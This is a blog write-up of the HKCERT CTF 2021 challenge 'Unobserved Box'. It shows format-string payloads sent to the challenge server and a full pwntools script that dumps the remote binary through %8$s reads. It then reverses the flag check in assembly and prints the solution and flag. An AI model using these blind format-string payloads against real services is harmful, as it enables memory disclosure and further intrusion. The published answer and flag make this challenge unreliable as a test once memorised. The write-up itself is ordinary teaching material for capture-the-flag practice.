Blog by grhkm

Unobserved Box (250 pts, 6 solves)

Team Name: O0027 - UND3r 20 D53 H473r5 4ND r374K3r

Solved by: grhkm and Kaiziron

Source of the problem: HKCERT CTF 2021

Problem Statement

All codes are uncertain before the measurement, and you will never make it.

Observe the code to get the flag.

nc chalp.hkcert21.pwnable.hk 28132

Solution Outline

We dump the binary from 0x400000 to 0x405000 using format string and %8$s, then reverse engineer the check function for the flag.

Initial Discoveries

Let’s have a look at the server:

❯ nc chalp.hkcert21.pwnable.hk 28132
AAAAAAAA
AAAAAAAA is not the correct answer.

❯ python3 -c "print('A' \* 200)" | nc chalp.hkcert21.pwnable.hk 28132
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA is not the correct answer.

❯ python3 -c "print('A' \* 2000)" | nc chalp.hkcert21.pwnable.hk 28132
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA is not the correct answer.

❯ python3 -c "print('%p|' * 25)" | nc chalp.hkcert21.pwnable.hk 28132
0x7fffe0708a40|0x7fffe0708a40|(nil)|0x7fcf5ced7d80|0x7fcf5ced7d80|0x70257c70257c7025|0x257c70257c70257c|0x7c70257c70257c70|0x257c70257c7025|0x401490| is not the correct answer.

Woah, we just found a format string vulnerability!

Dumping Binary

With the format string vulnerability, let’s tweak it to point to our input:

❯ python3 -c "print('%p' + '|' + 'A' * 20)" | nc chalp.hkcert21.pwnable.hk 28132
0x7ffc5c5ede60|AAAAAAAAAAAAAAAAAAAA is not the correct answer.

❯ python3 -c "print('%1\$p' + '|' + 'A' * 20)" | nc chalp.hkcert21.pwnable.hk 28132
0x7fffebbd6ef0|AAAAAAAAAAAAAAAAAAAA is not the correct answer.

...

❯ python3 -c "print('%8\$p' + '|' + 'A' * 20)" | nc chalp.hkcert21.pwnable.hk 28132
0x4141414141414141|AAAAAAAAAAAAAAAAAAAA is not the correct answer.

So now that our format string %8$p points to the input, how about we write an address to it? More importantly, we know that 64-bit code segments usually start at 0x400000, so we can explore that:

❯ python3 -c "print('%8\$p' + '|' + 'ABCDEFGHIJKLMNOPQRST')" | nc chalp.hkcert21.pwnable.hk 28132
0x535251504f4e4d4c|ABCDEFGHIJKLMNOPQRST is not the correct answer.

# 0x53 -> S, 0x4c -> L
❯ python3 -c "print('%8\$p' + '|' + 'ABCDEFGHIJK________')" | nc chalp.hkcert21.pwnable.hk 28132
0x5f5f5f5f5f5f5f5f|ABCDEFGHIJK________ is not the correct answer.

❯ python3 -c "print('%8\$p' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132
0x400000|ABCDEFGHIJK is not the correct answer.

Great, now note that the $s format provides functionality to output the string at the location. So for example in the last command above, if we replace %8$p with %8$s, we would get:

# the magic header has appeared
❯ python3 -c "print('%8\$s' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132
ELF|ABCDEFGHIJK is not the correct answer.

❯ python3 -c "print('%8\$s' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132 | hexdump -C
00000000  7f 45 4c 46 02 01 01 7c  41 42 43 44 45 46 47 48  |.ELF...|ABCDEFGH|
00000010  49 4a 4b 20 69 73 20 6e  6f 74 20 74 68 65 20 63  |IJK is not the c|
00000020  6f 72 72 65 63 74 20 61  6e 73 77 65 72 2e 0a     |orrect answer..|
0000002f

# remember - 64-bit systems!
❯ python3 -c "print('%8\$s' + '|' + 'ABCDEFGHIJK\x00\x00\x40\x00\x00\x00\x00\x00')" | nc chalp.hkcert21.pwnable.hk 28132 | python3 -c "print(input().split('|')[0], end='')" | hexdump -C
00000000  7f 45 4c 46 02 01 01                              |.ELF...|
00000007

Hurray! Since strings are terminated by null-bytes, we also know that the byte after the output is a null byte, and we can continue at that address and repeat.

(Note: if there is no output, which is the case for address 0x400008)

There are a few other issues to address. An important one is when the address contains \x0a, more commonly known as \n, the print statement will output a newline and the server skips the part afterwards. I simply skip over them, which shouldn’t cause too much of a problem - just a single byte replaced with a null byte.

Now let’s put this all into one python script:

from pwn import *
context.log_level = 'WARNING'

conn = None
host, port = 'chalp.hkcert21.pwnable.hk', 28132


def init():
    global conn
    if conn is not None:
        conn.close()
    conn = remote(host, port)


def dump(addr):
    # Turn 0x400102 into b'\x02\x01\x40\x00\x00\x00\x00\x00'
    bddr = bytes.fromhex(hex(addr)[2:].zfill(16))[::-1]
    # Handling special case: '\n'
    if b'\n' in bddr:
        return b''
    # Then construct payload: [fs]|[pad][bddr]
    fs = b'%8$s'
    pad = b'ABCDEFGHIJK'
    payload = fs + b'|' + pad + bddr
    # send it!
    init()
    conn.send(payload + b'\n')
    response = conn.recvuntil(b'|')[:-1]
    print(f'[*] {hex(addr)} => {response}')
    return response


addr = 0x400000
while True:
    # append, bytes
    with open('dump', 'ab') as fout:
        # ends at null byte
        res = dump(addr) + b'\0'
        addr += len(res)
        fout.write(res)
        fout.flush()

The next step is to let the code run zzz…

You can download the binary I got.

Reverse Engineering

Once we have sufficient amount of the binary, we can open it in IDA or other tools. Looking around, we find what seems to be the check function:

Scary for a crypto one-trick!

Each block is relatively simple, and we can go through them one by one. Just a trick in general - not everything has to be carefully checked and rigorous. Looking through the code and cracking it took us one minute - guess and hand-waving work is key!

push    rbp
mov     rbp, rsp
sub     rsp, 10h
mov     [rbp+var_8], rdi
mov     rax, [rbp+var_8]    # [rdp+var_8] is our input string (s)
mov     rdi, rax
call    sub_401060          # some libc function with a string parameter - len!
cmp     rax, 13h            # [1] len(s) == 19 (0x13)
jz      short loc_4011BA

mov     rax, [rbp+var_8]
add     rax, 6              # s[6]
movzx   eax, byte ptr [rax]
cmp     al, 5Fh             # [2] s[6] == '_' (0x5f)
jnz     short loc_4011E3

mov     rax, [rbp+var_8]
add     rax, 9
movzx   edx, byte ptr [rax] # edx = s[9]
mov     rax, [rbp+var_8]
add     rax, 6
movzx   eax, byte ptr [rax] # eax = s[6]
cmp     dl, al              # [3] s[6] == s[9]
jz      short loc_4011ED

mov     rax, [rbp+var_8]
mov     edx, 6
lea     rsi, aPrintf_0  ; "printf" # aww IDA is so nice
mov     rdi, rax
call    sub_401040          # some libc function with two string parameters (one is constant)
test    eax, eax            # probably strcmp
jz      short loc_401213    # [4] s[:6] == "printf"

mov     rax, [rbp+var_8]
add     rax, 0Ah            # start at s[10]
mov     edx, 6
lea     rsi, aDanger    ; "danger"
mov     rdi, rax
call    sub_401040
test    eax, eax            # [5] s[10:16] == "danger"
jz      short loc_40123D

mov     rax, [rbp+var_8]
add     rax, 12h
movzx   eax, byte ptr [rax]
cmp     al, 73h             # [6] s[18] == 's'
jz      short loc_401253

mov     rax, [rbp+var_8]
add     rax, 11h
movzx   eax, byte ptr [rax]
cmp     al, 75h             # [7] s[17] == 'u'
jz      short loc_401269

mov     rax, [rbp+var_8]
add     rax, 10h
movzx   eax, byte ptr [rax]
cmp     al, 6Fh             # [8] s[16] == 'o'
jz      short loc_40127F

mov     rax, [rbp+var_8]
add     rax, 2
movzx   edx, byte ptr [rax]
mov     rax, [rbp+var_8]
add     rax, 7
movzx   eax, byte ptr [rax]
cmp     dl, al               # [9] s[2] == s[7]
jz      short loc_4012A0

mov     rax, [rbp+var_8]
add     rax, 8
movzx   edx, byte ptr [rax]
mov     rax, [rbp+var_8]
add     rax, 12h
movzx   eax, byte ptr [rax]
cmp     dl, al               # [10] s[8] == s[18]
jz      short loc_4012C1

Putting them together, we have:

len(s) == 19
s[6] == '_'
s[6] == s[9]
s[:6] == "printf"
s[10:16] == "danger"
s[18] == 's'
s[17] == 'u'
s[16] == 'o'
s[2] == s[7]
s[8] == s[18]

No, don’t start writing a z3 solver script yet. Get your pen and paper and try it out!

Finally, we get that s == printf_is_dangerous. Supplying it to the remote server gives

❯ echo printf_is_dangerous | nc chalp.hkcert21.pwnable.hk 28132
hkcert21{l3akinG_the_world_giVE_U_7H3_FLAG}

Flag: hkcert21{l3akinG_the_world_giVE_U_7H3_FLAG}

Remarks

If this is your first time seeing blind format string, here are some good writeups from previous challenges: